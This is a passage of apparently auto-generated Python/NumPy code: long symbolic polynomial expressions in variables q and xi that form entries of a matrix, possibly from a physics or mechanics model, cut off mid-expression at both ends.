0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 53.3333333333333*q[0, 0] + 26.6666666666667*q[1, 0] + 26.6666666666667*q[2, 0]) + (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-38484469995.8182*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 1217672683.46143*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 23972930.955647*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 252839.506172839*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1066.66666666667*(q[4, 0] - q[5, 0])**2 + 1) + (12828156665.2727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 
0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0]))*(-12828156665.2727*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 2004399.47894886*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 + 1))*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)) + ((12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 
0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(12828156665.2727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])) + (-12828156665.2727*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 2004399.47894886*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 
84279.8353909465*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 + 1)*(-12828156665.2727*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 2004399.47894886*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 7990976.98521566*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 84279.8353909465*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 355.555555555555*(2*q[3, 0] - q[4, 0] - q[5, 0])**2 + 1) + (-2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 53.3333333333333*q[0, 0] + 26.6666666666667*q[1, 0] + 26.6666666666667*q[2, 0])*(2405279374.73864*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 898984.910836762*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 6320.98765432099*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 
30441817.0865359*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 53.3333333333333*q[3, 0] - 26.6666666666667*q[4, 0] - 26.6666666666667*q[5, 0]))*(-160351958.315909*xi**10*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2) - 4.44444444444444*xi**2*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)) - 160351958.315909*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 5073636.18108931*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 99887.2123151958*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 1053.49794238683*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 4.44444444444444*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) + (-160351958.315909*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 
0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(-12828156665.2727*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 2004399.47894886*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 + 1) + (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 
0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-160351958.315909*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 4.44444444444444*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)) + (-2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 53.3333333333333*q[0, 0] + 26.6666666666667*q[1, 0] + 26.6666666666667*q[2, 0])*(60131984.3684659*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] 
+ q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*q[3, 0] + (1/3)*q[4, 0] + (1/3)*q[5, 0] + 0.15)],
[-160351958.315909*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 4.44444444444444*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) + ((-4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(4810558749.47727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[4, 0] - q[5, 0])) + (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 
0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(12828156665.2727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])) + (-38484469995.8182*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 23972930.955647*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 
